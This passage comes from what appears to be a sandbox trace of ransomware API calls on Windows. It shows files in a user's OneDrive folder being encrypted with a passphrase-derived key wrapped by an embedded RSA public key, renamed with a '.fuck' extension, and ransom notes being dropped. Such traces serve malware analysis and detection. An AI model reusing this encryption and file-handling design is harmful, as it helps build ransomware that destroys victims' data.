pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.432] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.432] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.432] CryptEncrypt (in: hKey=0x2fc8c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.432] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.432] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.432] CryptEncrypt (in: hKey=0x2fc8c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.432] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.432] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.432] CryptEncrypt (in: hKey=0x2fc8c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.432] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.433] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.433] CryptEncrypt (in: hKey=0x2fc8c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.433] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.433] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.433] CryptEncrypt (in: hKey=0x2fc8c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.433] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.433] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.433] CryptEncrypt (in: hKey=0x2fc8c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.433] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.433] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.433] CryptEncrypt (in: hKey=0x2fc8c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.433] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.434] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.434] CryptEncrypt (in: hKey=0x2fc8c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.434] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.434] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.434] CryptEncrypt (in: hKey=0x2fc8c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.434] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.434] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.434] CryptEncrypt (in: hKey=0x2fc8c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.434] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.434] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.434] CryptEncrypt (in: hKey=0x2fc8c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.434] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.435] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.435] CryptEncrypt (in: hKey=0x2fc8c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.435] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.435] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.435] CryptEncrypt (in: hKey=0x2fc8c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.435] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.435] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.435] CryptEncrypt (in: hKey=0x2fc8c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.435] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.435] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.436] CryptEncrypt (in: hKey=0x2fc8c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.436] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.436] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.436] CryptEncrypt (in: hKey=0x2fc8c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.436] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.436] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.436] CryptEncrypt (in: hKey=0x2fc8c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.436] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.436] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x2d0, lpOverlapped=0x0) returned 1 [0281.436] CryptEncrypt (in: hKey=0x2fc8c8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x2d0, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x2e0) returned 1 [0281.436] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x2e0, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x2e0, lpOverlapped=0x0) returned 1 [0281.437] CloseHandle (hObject=0x5d80) returned 1 [0281.437] CloseHandle (hObject=0x5d4c) returned 1 [0281.437] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\mr\\FileSync.LocalizedResources.dll.mui.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\mr\\filesync.localizedresources.dll.mui.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\mr\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\mr\\filesync.localizedresources.dll.mui"), bFailIfExists=0) returned 1 [0281.447] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\mr\\FileSync.LocalizedResources.dll.mui", dwFileAttributes=0x0) returned 1 [0281.447] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\mr\\FileSync.LocalizedResources.dll.mui.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\mr\\filesync.localizedresources.dll.mui.gsg")) returned 1 [0281.450] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\mr\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\mr\\filesync.localizedresources.dll.mui"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\mr\\FileSync.LocalizedResources.dll.mui.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\mr\\filesync.localizedresources.dll.mui.fuck")) returned 1 [0281.453] CryptDestroyHash (hHash=0x2fa6c8) returned 1 [0281.453] CryptDestroyKey (hKey=0x2fc8c8) returned 1 [0281.453] CryptReleaseContext (hProv=0x2f1f190, dwFlags=0x0) returned 1 [0281.453] FindNextFileA (in: hFindFile=0x2fa4c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 0 [0281.454] FindClose (in: hFindFile=0x2fa4c8 | out: hFindFile=0x2fa4c8) returned 1 [0281.454] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\mr\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\mr\\readme_back_files.htm")) returned 0xffffffff [0281.454] AreFileApisANSI () returned 1 [0281.454] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2889688, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 96 [0281.454] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\mr\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\mr\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e0d8, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d3c [0281.456] GetFileType (hFile=0x5d3c) returned 0x1 [0281.456] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2b9cd24*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9cd1c, lpOverlapped=0x0 | out: lpBuffer=0x2b9cd24*, lpNumberOfBytesWritten=0x2b9cd1c*=0x5ec, lpOverlapped=0x0) returned 1 [0281.458] FindNextFileA (in: hFindFile=0x2fa488, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0281.458] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ms\\*.*", lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 0x2fa6c8 [0281.459] FindNextFileA (in: hFindFile=0x2fa6c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0281.459] FindNextFileA (in: hFindFile=0x2fa6c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0281.459] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9de64 | out: lpSystemTimeAsFileTime=0x2b9de64) [0281.459] GetLastError () returned 0x0 [0281.459] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ms\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\ms\\filesync.localizedresources.dll.mui")) returned 0x20 [0281.459] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ms\\FileSync.LocalizedResources.dll.mui", dwFileAttributes=0x80) returned 1 [0281.460] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ms\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\ms\\filesync.localizedresources.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d4c [0281.461] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ms\\FileSync.LocalizedResources.dll.mui.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\ms\\filesync.localizedresources.dll.mui.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d80 [0281.466] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ms\\FileSync.LocalizedResources.dll.mui.gsg", dwFileAttributes=0x2) returned 1 [0281.467] CryptAcquireContextA (in: phProv=0x2b9ce60, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9ce60*=0x2f1ee60) returned 1 [0281.470] CryptCreateHash (in: hProv=0x2f1ee60, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9ce64 | out: phHash=0x2b9ce64) returned 1 [0281.470] lstrlenA (lpString="OJqEEUaHrEmqTOCUsZRXkTNKzMlQm") returned 29 [0281.470] CryptHashData (hHash=0x2fa748, pbData=0x28cb3f0, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0281.470] CryptDeriveKey (in: hProv=0x2f1ee60, Algid=0x6610, hBaseData=0x2fa748, dwFlags=0x1000000, phKey=0x2b9ce50 | out: phKey=0x2b9ce50*=0x2fc5c8) returned 1 [0281.470] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0281.470] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9ce6c, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48 | out: pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48) returned 1 [0281.470] CryptAcquireContextA (in: phProv=0x2b9ce5c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9ce5c*=0x2f1ebb8) returned 1 [0281.471] CryptImportPublicKeyInfo (in: hCryptProv=0x2f1ebb8, dwCertEncodingType=0x1, pInfo=0x2f36ef0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2f36f20*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2f36f28*, PublicKey.cUnusedBits=0x0), phKey=0x2b9ce54 | out: phKey=0x2b9ce54*=0x2fc908) returned 1 [0281.471] CryptEncrypt (in: hKey=0x2fc908, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9ce44*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9ce44*=0x80) returned 1 [0281.471] CryptEncrypt (in: hKey=0x2fc908, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f1ea20*, pdwDataLen=0x2b9ce58*=0x18, dwBufLen=0x80 | out: pbData=0x2f1ea20*, pdwDataLen=0x2b9ce58*=0x80) returned 1 [0281.472] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f1ea20*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f1ea20*, lpNumberOfBytesWritten=0x2b9ce68*=0x80, lpOverlapped=0x0) returned 1 [0281.473] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.484] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.484] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.498] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.499] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.499] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.500] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.500] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, 